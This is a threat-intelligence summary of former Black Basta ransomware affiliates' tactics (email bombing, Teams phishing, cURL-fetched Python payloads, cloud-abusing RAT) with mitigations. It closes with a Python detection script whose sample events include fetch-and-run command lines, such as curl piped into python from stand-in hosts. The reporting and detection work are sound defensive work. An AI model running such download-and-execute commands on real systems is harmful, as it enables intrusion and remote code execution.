Full Report
Former members tied to the Black Basta ransomware operation have been observed sticking to their tried-and-tested approach of email bombing and Microsoft Teams phishing to establish persistent access to target networks. "Recently, attackers have introduced Python script execution alongside these techniques, using cURL requests to fetch and deploy malicious payloads," ReliaQuest said in a report
Analysis Summary
# Threat Actor: Former Black Basta Affiliates (Evolving Ransomware Actors)
## Attribution & Identity
Former members associated with the **Black Basta** ransomware operation.
**Known Aliases and Associated Groups:** Affiliates are suspected to have migrated to, or formed, new groups, notably the **CACTUS** RaaS group or **BlackLock**; they may also have influenced the **BlackSuit** ransomware group.
## Activity Summary
Following the decline of the Black Basta brand after internal chat log leaks in February 2025, former members are observed pivoting their tactics. They are continuing to employ well-established social engineering techniques, primarily email bombing and Microsoft Teams phishing, to gain initial access. Recently, they have incorporated Python script execution via cURL requests to deploy initial payloads. Some observed activities suggest the adoption of Black Basta's initial access strategies by the **BlackSuit** ransomware group. The shutdown of the Black Basta data-leak site suggests affiliates either joined another RaaS or formed a new entity.
## Tactics, Techniques & Procedures
- **Initial Access:** Email bombing and Microsoft Teams phishing.
- **Initial Access Vectors:** Attacks leveraged `onmicrosoft[.]com` domains (50% of observed Teams phishing) or compromised, legitimate domains (42% during Feb–May 2025) for phishing.
- **Post-Exploitation/C2 Establishment:**
  - Establishment of initial Remote Desktop sessions using **Quick Assist** and **AnyDesk**.
  - Downloading and executing a malicious **Python script** to establish Command-and-Control (C2).
- **Credential Harvesting & Persistence:** Using updated variants of a **Java-based RAT** previously seen in Black Basta attacks. This RAT now abuses cloud services (Google Drive, OneDrive, Google Sheets) as C2 proxies/exfiltration points.
  - RAT capabilities include: credential harvesting from web browsers, initiating SOCKS5 proxy tunnels, file transfer, presenting fake Windows login windows, and executing Java classes in memory.
- **Additional Tooling:** Use of the tunneling backdoor **QDoor** (previously attributed to BlackSuit) and a **Rust payload** likely custom-built for the SSH utility.
- **Evolving Tactic:** Increased use of Python scripts for payload deployment post-initial access.
## Targeting
- **Sectors:** Finance, Insurance, and Construction sectors have been specifically targeted via Teams phishing impersonating help desk personnel.
- **Geography:** Not explicitly detailed, but associated groups often target global entities.
- **Victims:** Specific named organizations are not listed, only the targeted sectors.
## Tools & Infrastructure
- **Malware Families Used:**
  - Java-based RAT (updated variant).
  - QDoor (tunneling backdoor).
  - Anubis (Python RAT).
  - Rust payload (SSH utility loader).
- **Infrastructure (C2):**
  - Abuse of legitimate cloud services for proxying commands/data: **Google Drive**, **OneDrive**, and **Google Sheets**.
  - Remote addresses used for fetching Python scripts.
## Implications
The continued adaptation by former Black Basta affiliates demonstrates the resilience of established ransomware operators, who quickly pivot to successor groups or new structures after major operational setbacks. Their migration towards abusing legitimate Cloud Service Providers (CSPs) for C2 and data exfiltration presents a significant challenge for network defenders, as this traffic blends well with normal organizational activity. The adoption of Python scripts suggests a shift towards more versatile, less signature-dependent initial deployment methods.
## Mitigations
- Enhance scrutiny and verification protocols for all email and Microsoft Teams communications, particularly those impersonating internal IT/Help Desk personnel.
- Investigate and restrict cURL usage aimed at external, non-standard repositories during initial access stages.
- Monitor for the deployment (or execution attempts) of Python scripts originating from initial access vectors that then establish C2 communications or download larger payloads.
- Implement robust monitoring on outbound traffic to CSPs like Google Drive and OneDrive for anomalous file transfers or unexpected command-and-control patterns associated with known RAT activity.
- Review endpoint detection rules for the Java-based RAT, QDoor, and Anubis RAT indicators.
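As an added example (not from the ReliaQuest report or any tool it names), the Python sketch below applies the cURL and Python-script mitigations above to constructed process-creation events: it flags curl fetching a script from a host outside an assumed allowlist, curl output piped straight into python, and a later python.exe run of the file that curl staged. The allowlist, the event format and the sample hosts are assumptions.

```python
import re

# Approved download sources: an assumed allowlist, replace with the organization's own.
ALLOWED_HOSTS = {"artifacts.corp.example"}
SCRIPT_EXT = (".py", ".pyw", ".ps1", ".exe", ".dll", ".js")
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.I)
OUT_RE = re.compile(r"(?:-o|--output)\s+\"?([^\s\"]+)", re.I)

def curl_download(cmdline):
    """Return (host, output_path) for a curl command line, or None if it is not curl."""
    if not re.search(r"\bcurl(\.exe)?\b", cmdline, re.I):
        return None
    host = URL_RE.search(cmdline)
    out = OUT_RE.search(cmdline)
    return (host.group(1).lower() if host else None, out.group(1) if out else None)

def detect(events):
    """Walk process-creation events in order and return (rule, host, detail) alerts."""
    alerts, staged = [], {}   # staged: lower-cased file path -> external host it came from
    for ev in events:
        cmd = ev["cmdline"]
        dl = curl_download(cmd)
        if dl:
            host, path = dl
            if host and host not in ALLOWED_HOSTS:
                if path and path.lower().endswith(SCRIPT_EXT):
                    staged[path.lower()] = host       # remember the file curl wrote to disk
                    alerts.append(("curl_external_script", host, path))
                if re.search(r"\|\s*python", cmd, re.I):   # curl output piped into python
                    alerts.append(("curl_pipe_python", host, cmd))
        elif ev["proc"].lower().startswith("python"):
            for path, host in staged.items():
                if path in cmd.lower():               # python executing a curl-staged file
                    alerts.append(("python_runs_curl_payload", host, path))
    return alerts

# Constructed sample events (not from the report); hosts are documentation-range addresses.
SAMPLE_EVENTS = [
    {"proc": "curl.exe", "cmdline": r"curl.exe -o C:\Users\Public\update.py http://203.0.113.10/update.py"},
    {"proc": "python.exe", "cmdline": r"python.exe C:\Users\Public\update.py"},
    {"proc": "python.exe", "cmdline": r"python.exe C:\src\build.py"},
    {"proc": "curl.exe", "cmdline": "curl.exe https://artifacts.corp.example/pkg.zip -o pkg.zip"},
    {"proc": "cmd.exe", "cmdline": "cmd.exe /c curl -s http://198.51.100.7/a.py | python -"},
]

if __name__ == "__main__":
    for rule, host, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:26} {host:16} {detail}")
```

The in-memory `staged` map only correlates within one batch of events; in a SIEM the same join would be keyed on host and output path across the ingestion window.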